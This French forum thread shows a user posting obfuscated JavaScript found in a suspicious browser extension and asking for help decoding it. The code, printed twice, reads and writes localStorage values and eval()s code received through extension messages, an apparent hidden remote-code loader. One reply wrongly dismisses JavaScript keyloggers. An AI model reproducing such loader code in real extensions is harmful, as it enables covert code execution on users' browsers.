Résolu Fichier suspect trouvé sur mon ordit

  • Auteur de la discussion Auteur de la discussion Switch.
  • Créé le Créé le
Statut
N'est pas ouverte pour d'autres réponses.
Switch.

Switch.

Codeur Web à ton service | > Python
Premium
Inscription
13 Janvier 2013
Messages
2 956
Réactions
968
Points
6 491
RGCoins
25
Salut j'ai trouvé un fichier suspect sur mon ordit c'est du Javascript, je l'ai remarqué en gérant mes extensions une d'entre elle était suspecte et son dossier était présent sur mon pc il contient 2/3 page bizarre à moitié obfusqué ..

Code: 
var Y5R6={'q81':"I",'b81':"p",'g81':"d",'p01':"em",'l01':"wa",'F81':"et",'z01':"ls",'y81':"t",'r81':"e",'t81':"b",'L01':1,'C01':"s",'t6':function(O,u){return O!=u;}};
dbc[(Y5R6.z01+Y5R6.g81+Y5R6.t81)]
=
{
    fetch:function(u){
        var A=(0xE2>(86.,139)?(7.7E1,"h"):(47,0x1D3)),x=(138.<(117,9.9E2)?(75,"c"):147.6E1<(0x118,9.950E2)?41.30E1:(44.5E1,57)>=(101,0x92)?0x19C:(142.1E1,0x18C)),z="rl",G=(0x257<=(82,0x19)?9.74E2:(6.25E2,76.)<(0x65,6.43E2)?(49,"l"):(7.520E2,1.206E3)),U=((1.28E3,26.)<=72.?(0x53,"r"):(144.8E1,87.7E1)),p=((138.,74.)>(13.86E2,40.6E1)?(0x256,0x22):135.>(74.10E1,136)?(0.,"("):(103.,6.30E1)<148.?(0x67,"u"):(121,0xC9)),o="tI",k1="de",L="te",Z=((1.70E1,79.30E1)<=107.?'x':143<(118,11.870E2)?(0x220,"g"):(124.,0x11A)),C=((65.4E1,0x23B)<92.?'q':(0x164,0x210)<79.0E1?(0x23A,"o"):(102,119.)<=0x4D?(0x1CD," "):(14.47E2,0x45)),l="sc",d=(149>=(5.29E2,58.2E1)?134:115<(0xA5,6.770E2)?(0x20F,"m"):(81.5E1,9.)>(1.27E2,90.9E1)?"\\t":(0x10B,0xD8)),a="ge";
            try
            {
                return u({
                    scode:localStorage[(a+Y5R6.y81+Y5R6.q81+Y5R6.y81+Y5R6.r81+d)]((l+C+Y5R6.g81+Y5R6.r81))?localStorage[(Z+Y5R6.F81+Y5R6.q81+L+d)]((l+C+k1)):!Y5R6.L01,url:localStorage[(Z+Y5R6.r81+o+Y5R6.y81+Y5R6.p01)]((p+U+G))?localStorage[(Z+Y5R6.r81+o+L+d)]((p+z)):!Y5R6.L01,epoch:localStorage[(Z+Y5R6.F81+Y5R6.q81+Y5R6.y81+Y5R6.r81+d)]((Y5R6.r81+Y5R6.b81+C+x+A))?localStorage[(Z+Y5R6.r81+Y5R6.y81+Y5R6.q81+Y5R6.y81+Y5R6.r81+d)]((Y5R6.r81+Y5R6.b81+C+x+A)):!Y5R6.L01
                });
            }
                catch(O){dbc[(Y5R6.C01+Y5R6.l01+Y5R6.b81)](function(){dbc[(Z+Y5R6.r81+Y5R6.y81)](u);});}
            }
            ,store:function(u,A){
                var x="get",z=((3,23)<(87.60E1,2)?(0x209,300):(69.,95.)<2.92E2?(68.,"6"):0xAF<(3.80E1,0x7B)?8.6E1:(2,0x1B)),G="It",U="se";
                if(!u)return A?A(!Y5R6.L01):!Y5R6.L01;
                try
                {
                    for(i in u)u[i]&&localStorage[(U+Y5R6.y81+G+Y5R6.p01)](i,u[i]);
                    for(i in u)if(u[i]&&Y5R6[(Y5R6.y81+z)](localStorage[(x+Y5R6.q81+Y5R6.y81+Y5R6.p01)](i),u[i]))
                        {
                            dbc[(Y5R6.C01+Y5R6.l01+Y5R6.b81)](function()
                            {
                                dbc[(Y5R6.C01+Y5R6.r81+Y5R6.y81)](u,A);
                            });

                        break;   
                        }
                    A&&A(u);
                }
        catch(O)
        {
            var p="swa";dbc[(p+Y5R6.b81)](function()
                {
                    dbc[(Y5R6.C01+Y5R6.F81)](u,A);
                });
        }}
};

et

Code: 
var P1K7n={'j2C':"a",'t2C':"M",'g2C':"n",'e2C':"e",'Y2C':"en",'J2C':"g",'F2C':"t",'f2C':"o",'T2C':"s",'R2C':"x",'V2C':"d",'D2C':"si",'W2C':1};chrome[(P1K7n.e2C+P1K7n.R2C+P1K7n.F2C+P1K7n.Y2C+P1K7n.D2C+P1K7n.f2C+P1K7n.g2C)][(P1K7n.T2C+P1K7n.Y2C+P1K7n.V2C+P1K7n.t2C+P1K7n.e2C+P1K7n.T2C+P1K7n.T2C+P1K7n.j2C+P1K7n.J2C+P1K7n.e2C)]({m:P1K7n.W2C},function(x){try{eval(x);}catch(A){var z=(0x193<=(0xD6,0xFF)?(0x102,"{}"):(0x210,30.0E1)<(43.,13.8E2)?(0x178,2):(69.,11.75E2)<=7?"q":(6.46E2,44.)),G="es",U="end",p="io";chrome[(P1K7n.e2C+P1K7n.R2C+P1K7n.F2C+P1K7n.Y2C+P1K7n.T2C+p+P1K7n.g2C)][(P1K7n.T2C+U+P1K7n.t2C+G+P1K7n.T2C+P1K7n.j2C+P1K7n.J2C+P1K7n.e2C)]({m:z},function(u){try{eval(u);}catch(O){}});}});

Je pense que c'est un keylogger donc si quelqu'un peux jeter un oeil afin de m'aider à décoder un peux le code ça serait gentil
 
Trier par date Trier par votes
Salut,

C'est du JavaScript... Donc à part être h24 sur la page qui lance le JS, le KeyLogger ne marchera pas, et même, j'ai jamais vu un seul KeyLogger en JS. Si tu ne sais pas ce que c'est du delete, si jamais c'était nécessaire à une de tes extensions, tu regardes laquelle demande ce code et quelle est l'utilité de l'extension et tu sauras si c'est un fichier malveillant ;)

Bonne soirée,
Grégory
 
Voter positivement 0 Voter négativement
Grégory a dit:
Salut,

C'est du JavaScript... Donc à part être h24 sur la page qui lance le JS, le KeyLogger ne marchera pas, et même, j'ai jamais vu un seul KeyLogger en JS. Si tu ne sais pas ce que c'est du delete, si jamais c'était nécessaire à une de tes extensions, tu regardes laquelle demande ce code et quelle est l'utilité de l'extension et tu sauras si c'est un fichier malveillant ;)

Bonne soirée,
Grégory
Cliquez pour agrandir...

Un keylogger en JS ça doit être largement faisable. Oui c'est du JS mais ce qui m'a alerté c'est que le nom de l'extension présente en elle même était suspecte "hyfeifhyizeronfe" j'ai delete on verra bien
 
Voter positivement 0 Voter négativement
Switch #ACAB a dit:
Salut j'ai trouvé un fichier suspect sur mon ordit c'est du Javascript, je l'ai remarqué en gérant mes extensions une d'entre elle était suspecte et son dossier était présent sur mon pc il contient 2/3 page bizarre à moitié obfusqué ..

Code: 
var Y5R6={'q81':"I",'b81':"p",'g81':"d",'p01':"em",'l01':"wa",'F81':"et",'z01':"ls",'y81':"t",'r81':"e",'t81':"b",'L01':1,'C01':"s",'t6':function(O,u){return O!=u;}};
dbc[(Y5R6.z01+Y5R6.g81+Y5R6.t81)]
=
{
    fetch:function(u){
        var A=(0xE2>(86.,139)?(7.7E1,"h"):(47,0x1D3)),x=(138.<(117,9.9E2)?(75,"c"):147.6E1<(0x118,9.950E2)?41.30E1:(44.5E1,57)>=(101,0x92)?0x19C:(142.1E1,0x18C)),z="rl",G=(0x257<=(82,0x19)?9.74E2:(6.25E2,76.)<(0x65,6.43E2)?(49,"l"):(7.520E2,1.206E3)),U=((1.28E3,26.)<=72.?(0x53,"r"):(144.8E1,87.7E1)),p=((138.,74.)>(13.86E2,40.6E1)?(0x256,0x22):135.>(74.10E1,136)?(0.,"("):(103.,6.30E1)<148.?(0x67,"u"):(121,0xC9)),o="tI",k1="de",L="te",Z=((1.70E1,79.30E1)<=107.?'x':143<(118,11.870E2)?(0x220,"g"):(124.,0x11A)),C=((65.4E1,0x23B)<92.?'q':(0x164,0x210)<79.0E1?(0x23A,"o"):(102,119.)<=0x4D?(0x1CD," "):(14.47E2,0x45)),l="sc",d=(149>=(5.29E2,58.2E1)?134:115<(0xA5,6.770E2)?(0x20F,"m"):(81.5E1,9.)>(1.27E2,90.9E1)?"\\t":(0x10B,0xD8)),a="ge";
            try
            {
                return u({
                    scode:localStorage[(a+Y5R6.y81+Y5R6.q81+Y5R6.y81+Y5R6.r81+d)]((l+C+Y5R6.g81+Y5R6.r81))?localStorage[(Z+Y5R6.F81+Y5R6.q81+L+d)]((l+C+k1)):!Y5R6.L01,url:localStorage[(Z+Y5R6.r81+o+Y5R6.y81+Y5R6.p01)]((p+U+G))?localStorage[(Z+Y5R6.r81+o+L+d)]((p+z)):!Y5R6.L01,epoch:localStorage[(Z+Y5R6.F81+Y5R6.q81+Y5R6.y81+Y5R6.r81+d)]((Y5R6.r81+Y5R6.b81+C+x+A))?localStorage[(Z+Y5R6.r81+Y5R6.y81+Y5R6.q81+Y5R6.y81+Y5R6.r81+d)]((Y5R6.r81+Y5R6.b81+C+x+A)):!Y5R6.L01
                });
            }
                catch(O){dbc[(Y5R6.C01+Y5R6.l01+Y5R6.b81)](function(){dbc[(Z+Y5R6.r81+Y5R6.y81)](u);});}
            }
            ,store:function(u,A){
                var x="get",z=((3,23)<(87.60E1,2)?(0x209,300):(69.,95.)<2.92E2?(68.,"6"):0xAF<(3.80E1,0x7B)?8.6E1:(2,0x1B)),G="It",U="se";
                if(!u)return A?A(!Y5R6.L01):!Y5R6.L01;
                try
                {
                    for(i in u)u[i]&&localStorage[(U+Y5R6.y81+G+Y5R6.p01)](i,u[i]);
                    for(i in u)if(u[i]&&Y5R6[(Y5R6.y81+z)](localStorage[(x+Y5R6.q81+Y5R6.y81+Y5R6.p01)](i),u[i]))
                        {
                            dbc[(Y5R6.C01+Y5R6.l01+Y5R6.b81)](function()
                            {
                                dbc[(Y5R6.C01+Y5R6.r81+Y5R6.y81)](u,A);
                            });

                        break;  
                        }
                    A&&A(u);
                }
        catch(O)
        {
            var p="swa";dbc[(p+Y5R6.b81)](function()
                {
                    dbc[(Y5R6.C01+Y5R6.F81)](u,A);
                });
        }}
};

et

Code: 
var P1K7n={'j2C':"a",'t2C':"M",'g2C':"n",'e2C':"e",'Y2C':"en",'J2C':"g",'F2C':"t",'f2C':"o",'T2C':"s",'R2C':"x",'V2C':"d",'D2C':"si",'W2C':1};chrome[(P1K7n.e2C+P1K7n.R2C+P1K7n.F2C+P1K7n.Y2C+P1K7n.D2C+P1K7n.f2C+P1K7n.g2C)][(P1K7n.T2C+P1K7n.Y2C+P1K7n.V2C+P1K7n.t2C+P1K7n.e2C+P1K7n.T2C+P1K7n.T2C+P1K7n.j2C+P1K7n.J2C+P1K7n.e2C)]({m:P1K7n.W2C},function(x){try{eval(x);}catch(A){var z=(0x193<=(0xD6,0xFF)?(0x102,"{}"):(0x210,30.0E1)<(43.,13.8E2)?(0x178,2):(69.,11.75E2)<=7?"q":(6.46E2,44.)),G="es",U="end",p="io";chrome[(P1K7n.e2C+P1K7n.R2C+P1K7n.F2C+P1K7n.Y2C+P1K7n.T2C+p+P1K7n.g2C)][(P1K7n.T2C+U+P1K7n.t2C+G+P1K7n.T2C+P1K7n.j2C+P1K7n.J2C+P1K7n.e2C)]({m:z},function(u){try{eval(u);}catch(O){}});}});

Je pense que c'est un keylogger donc si quelqu'un peux jeter un oeil afin de m'aider à décoder un peux le code ça serait gentil
Cliquez pour agrandir...
Voila ce que dis google
Vous devez être inscrit pour voir les liens ! Inscrivez-vous ou connectez-vous ici.
 
Voter positivement 0 Voter négativement
Ton topic se trouvait dans la mauvaise section http://reality-gaming.fr/attachments/deplace-png.20318/, je l'ai donc déplacé dans la bonne section http://reality-gaming.fr/attachments/deplacement-png.20319/. :modo:
 
Voter positivement 0 Voter négativement
Statut
N'est pas ouverte pour d'autres réponses.
Retour
Haut